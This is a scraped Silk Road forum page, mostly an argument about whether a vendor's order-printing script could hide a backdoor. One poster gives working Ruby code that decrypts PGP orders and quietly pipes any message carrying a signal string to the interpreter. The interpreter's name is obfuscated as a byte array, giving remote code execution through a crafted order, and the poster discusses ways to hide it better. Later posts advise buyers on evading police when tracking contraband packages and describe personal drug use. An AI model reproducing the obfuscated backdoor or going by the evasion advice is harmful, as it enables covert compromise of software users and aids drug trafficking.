Silk Road forums

Well, for a start you'd need to translate your Ruby exploit to Python, but ignore that for now.

First I would need to learn Python but I am not going to bother to because I already showed it in Ruby, and the two languages are very similar. Object oriented (usually) interpreted scripting languages.

a) shipping the code with encrypted data that is decrypted and run when the code is executed AND the code is being executed on a system with network access;

Yes it would need to be run on a system with network access, no it does not need to ship the code with encrypted data it gets the malicious code after a vendor decrypts it with their own key.

inserting a function that checks decrypted addresses for such code to run AND is used in conjunction with an order containing that code AND is being run on a system with network access.

It doesn't need to check for code, it can check for anything. It can run messages that are 101 bytes as ruby code and puts all the others. And actually it doesn't even need that because you can directly issue commands to the terminal with Ruby at least and I would highly bet that you can with python. having `ping t.cc` in a script will ping t.cc, just need to encode it in some funky way to try to hide that it is happening. Now there is no need to load networking modules at all or to run any decrypted messages as code.

* No encrypted data is shipped with my code.

But it gets encrypted data input from random customers

* There is a copy of my GPG key currently.  I think I will remove it in light of this and just include the details for obtaining it (it's here, on the vendor pages and on the key servers).

There is no reason for there to be a copy of your GPG key, in the example I gave the exploit is encrypted to the vendors key and they load it into the program, they have no ability to tell encrypted ruby code apart from encrypted addresses because ciphertext looks random in either case.

* There is no such exploit in my code.

Possibly not. Probably not even! But nobody really knows unless we can look at it. That is the entire point of this thread. We should not have a culture here where peoples claims are taken at face value, especially when vendors are at risk. The purpose of my posting code was simply to show that even a tiny bit of code can make the difference between a secure program and a backdoored one. Honestly I was surprised at how well the backdoor was hidden, certainly better than in my first attempt where I simply unpacked all the calls to arrays of numbers. I have never tried hiding backdoors in code before, and if I tried harder I could probably even make it more subtle than the last example I gave.

* Such an exploit would be able to be spotted.

Indeed by anyone who know the language well enough to

A. Know what back ticks do
B. Know what pack and unpack do
C. Know what | does on a terminal
D. Know what irb is
E. Knows the language, since they wouldn't just look at that part of the code but would need to audit the entire thing

Such an exploit would be possible to spot if the program went through auditing, someone who doesn't know ruby is not going to look at my code and realize what is going on, they are going to see it doesn't have networking code included with it has no IP addresses or ports listed has no encrypted data included and then assume that they are safe. It would be even less likely to be spotted if I encoded the | as well, or maybe even the entire shell command.

[quote[* My code does not require or use a network connection in any way (vendors an make their own decisions on whether or not to utilise an air gap).[/quote]

Neither does the example code I showed, it gets the networking require from the decrypted ciphertext.

* Vendors do not need to purchase this using their vendor account, they can create a buyer's account, use that to conceal who they are and that they're using my code (as is the case for the vendor who asked me to write it).  This would pretty effectively stop an exploit checking address data from being used in a live system.

You would still have intelligence that someone who needs software to manage printing a lot of addresses for them is using a certain IP address.

So, your assertion that "100% of people who buy the script from Louis" will be fucked/exploited is as vile and baseless an assertion as Pine's statement that I am working for law enforcement.  It's one thing to to say, "here's how an exploit" could work, but it is another thing entirely to say that because you can think of an exploit then that's what I must be doing and therefore I am whatever you say I am.

I am just saying that we have no fucking clue what you are doing and I demonstrated that not all backdoors are as obvious as one would assume, even in a language like Ruby, which is similar enough to Python that the example works for demonstration purposes.

You, sir, are now engaging in the same type of vile and slanderous accusations as Pine.  Your assertion here that my code must contain an exploit because you thought of a way it might be done is as baseless as saying that because paedophiles use anonymous networks then everyone using an anonymous network is a paedophile.  It is a fallacious argument and I believe you know this, now you're just flinging mud in the hope that it sticks.

Stop reading into shit. I never said your code must contain an exploit. I countered your claim that your code MUST NOT contain an exploit because it has NO NETWORKING CODE by showing how a single array of three numbers and a call to pack (which has nothing to do with networking) is all it takes for it to have networking code remotely injected into it (with user interaction....but the user interaction that the entire system is designed to handle anyway) via a ciphertext created from a specially crafted plaintext.

Except elsewhere you have asserted that it is more than mere potential when you said that 100% of people using my software would be fucked/exploited (see my reply to that statement).

I don't recall saying that, but maybe I did I guess. Maybe you have confused me with Pine???

It uses *very* simple functions, I can explain what things like file.write() and file.readlines() do and then point them at the documentation (which includes examples) to show that I am not lying.

You can explain to people who don't know python that your python script is not backdoored. I could explain to people that | #{[105, 114, 98].pack("c*") sets the formatting of the text, I don't expect them to analyze every single line of what I write simply because they would essentially be learning Ruby to make sure I did not do anything sketchy. Wouldn't it make more sense for me to release the code here, then if anyone who knows Ruby looks at it they might realize what is going on and warn others. And if they know Ruby why are they going to buy something like this??

Then why don't you?  Either put your money where your mouth is, buy the code and release it or put your Ruby where your mouth is and code a free alternative.

Hm maybe I will although to be honest right now I am pretty busy working on other things that I will release publicly and not expect people to blindly trust.

Running an executable .py file uses the Python interpreter to run the code.  Imported modules are compiled at the time of import by the Python interpreter and run (which generates the .pyc files).  Python itself is built in C (which is obviously compiled) with some modules written in C and some in Python.

Ruby is same written in C with much of the modules also C. The primary difference seems to be that python has made it easy to get bytecode for running later without being parsed by the interpreter. That is coming in ruby 2.0 .

If the Python interpreter were exploited, that could be a vector of attack.  If I'd said "use this code with my custom version of Python" then sure, nail my arse to the wall.  I didn't because as long as it's an official release with support for the modules used (currently csv, but likely csv and os when the shell scripts are replaced at some nebulous point in the future) I don't really care.  There are enough code savvy eyes looking at the Python code base to make sure someone doesn't sneak something in there.

I am not at all worried that the primary  python interpreters are going to be exploited anymore than I am that firefox is. What I am worried about is the fact that someone buying a script like this is not going to recognize | #{[105, 114, 98].pack("c*") is the difference between secure and backdoored. To recognize that you would need to know about both pack and unpack as well as ways of encoding data as well as what the pipe symbol does on the terminal as well as what back ticks do in ruby. The actual program distributed would have no networking code, would make a single call to GPG using the users own key, and could even be made more sneaky by removing the need for an if else statement.

Quote from: kmfkewm on September 08, 2012, 12:18 pm

try this on for size.....

the actual program I would maliciously distribute would be a bit bigger (to actually serve a purpose other than to demonstrate a clever backdoor) but would have this in it ...

Which would be easy to spot by either the presence of the encrypted message or a decryption command other than the one included in the existing code.  In order to get it to run with the existing sroppy config it would need to be a .asc file that is distributed initially which is encrypted to the vendor's key (which may be different from the key they are communicating with me with and may not reveal the vendor's username).

So let's be clear: there is NO encrypted data distributed with my code.  The only encrypted data used is taken from the vendor's own order page and it is all handled the same way (decrypted, converted to a printable format and then printed).

There is nothing encrypted in my example either, the only encrypted data would be ciphertexts encrypted by anyone to the vendors key. The trick is that if one of the ciphertexts decrypts into a plaintext with a signaling string in it, the entire rest of the message is treated as a totally independent Ruby script. I will change the comments to be more accurate.

#opens the file with your GPG ciphertext in it. Right now you need to have a file that holds them, however the ciphertext can come from anywhere.
file = File.open("test", "r")

#creates a string variable named message
message = ""

#reads the ciphertext file line by line and adds each line to the string variable message, loading the ciphertext into memory
while line = file.gets
message << line
end


#decrypts the message and references the plaintext with the variable decrypted_message
#the ciphertext is decrypted by taking the ciphertext in memory and sending it to the command line
#which then echos it and pipes it to gpg with the -d command. You will be prompted by GPG for
#your passphrase.

decrypted_message = `echo "#{message}" | gpg -d`


#if the decrypted message has the string gpg-privacy-toolkit anywhere in it then the decrypted message is
#piped to the command line where it is echoed and then piped to the ruby interpreter which is called with
#the word irb which is represented as an arracy of numbers to try and obfuscate what is going on. The pipe (|)
# can also be encoded in this way. Once the decrypted message is piped to irb it is treated as a ruby script,
# so if there is networking code in the decrypted message then networking can take place even though there
# is no networking code in this program, the decrypted message is treated as an entirely new script.
if decrypted_message.include?("gpg-privacy-toolkit")
 puts `echo "#{decrypted_message}" | #{[105, 114, 98].pack("c*")}`

#if the decrypted message doesn't have the signal gpg-privacy-toolkit in it, then merely put the output
#of echoing the decrypted message, which is a bit convoluted since we could just puts the decrypted
#message directly, but it makes the special case seem less sketchy to do it this way.
else
 puts `echo "#{decrypted_message"}`
end

#it could be made to look even less sketchy by piping every message to irb and echoing the output of it
#and making it a string to puts if it doesn't contain the special signal string or otherwise treating it as a
#script, then messages will be printed to the terminal unless they have the special signal string
#but there will be no need for an if else statement.

Quote from: kmfkewm on September 08, 2012, 03:19 pm

Quote from: Rinx on September 08, 2012, 02:35 pm

Checking shipping once in a blue moon should be fine as long as you don't track on TOR

Checking tracking without Tor is fine if you don't care that it links your IP address to the package

I  agree that tor is probably better but since this is a unique querry could it be used to try to track the route back thru tor? Not understanding Tor this might be a stupid question

Check tracking with Tor, your package could be flagged as likely contraband. Check tracking without Tor, you link your IP address to the package. Check tracking from Open Wifi from random locations frequently your address could be flagged as likely getting contraband. Check tracking from your own IP address and the package is strongly linked to you and good bye plausible deniability and good bye any benefit of using a fake ID box or similar. Don't check tracking and you wont know when it says "your package has been seized by the feds, ur gonna get ass raped" and then the benefits of using a fake ID box or similar are reduced and you can't clean house before the raid.

I usually take LSD once a week, these days some weed every now and then maybe a little ketamine or some random other drug once in a blue moon. Sometimes I go a month without using anything. Sometimes I go on month long binges.

Checking shipping once in a blue moon should be fine as long as you don't track on TOR

Checking tracking without Tor is fine if you don't care that it links your IP address to the package

It seems to me that in an anarcho-capitalist society there would still be just as many extremely powerful people who have power over the rights of other people, and that they just wouldn't be in "official" positions.  There would still be a vast difference in rights between the rich and everyone else.  To me that's not true human equality.

Agorism is not magic and there will always be people who try to unfairly control others. As an extreme analogy: No matter how many men desire to, or how righteous their desire is, they can never stop an omnipotent being from doing as it pleases with them. No political ideology or popular support could change such a scenario. Agorism itself is largely tied to the non-aggression principle, people should be free to do what they please so long as they do not infringe on the freedom of others. Anyone who infringes on the freedom of others is seen as a threat and attempts will be made to stop them, generally via private defense agencies. The rich and powerful could have their own agencies that try to allow them to do whatever they please, that is simply a fact of reality and nothing can change it. However nobody says that they will win. Look at the powerful agencies such as FBI and DEA, it appears as if they have been stripped of their power to oppress by a single man using open source software. Good and evil will always fight but thankfully there is nothing to stop good from winning many battles in what is likely to be a never ending war.